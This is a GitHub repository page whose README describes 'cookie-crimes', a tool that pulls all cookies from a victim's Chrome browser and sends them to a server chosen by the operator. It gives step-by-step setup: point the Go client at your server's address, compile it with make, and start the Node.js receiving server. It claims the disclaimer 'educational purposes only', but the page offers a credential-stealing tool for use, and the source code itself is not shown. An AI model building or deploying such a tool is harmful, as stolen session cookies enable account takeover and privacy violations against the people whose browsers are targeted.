Skip to content

Kongthap-code/cookie-crimes

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

8 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

cookie-crimes πŸ”

Cookie_Crimes is a tool designed to extract cookies from a client's Chrome browser.
With just a single click, all cookies stored in the browser will be captured and immediately sent to a specified server.

⚠️ Disclaimer
This project is strictly intended for educational and research purposes only.
The authors and contributors are not responsible for any misuse, damage, or legal consequences resulting from the use of this software.
Use this tool ethically and with respect for others' privacy.


πŸ“‹ Setup Instructions

πŸ”§ Client Side

  1. Navigate to the client folder.
  2. Open the main.go file (Go is used due to its simplicity and easy compilation).
  3. Replace:
    http://localhost:8080
    with your server's IP address or domain.
  4. Save and close the file.
  5. Run the following command to build the executable:
    make build
    This will compile main.go into an executable binary using the provided Makefile.

🌐 Server Side

  1. Navigate to the server directory.
  2. Install required dependencies:
    npm install
  3. Start the server:
    node index.js

🎁 You're All Set!

Once both the client and server are running, any execution of the client binary will send browser cookies to your specified server.

πŸ’‘ Use responsibly and only in controlled, ethical environments.

About

πŸ“˜ This project was created for educational purposes only.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors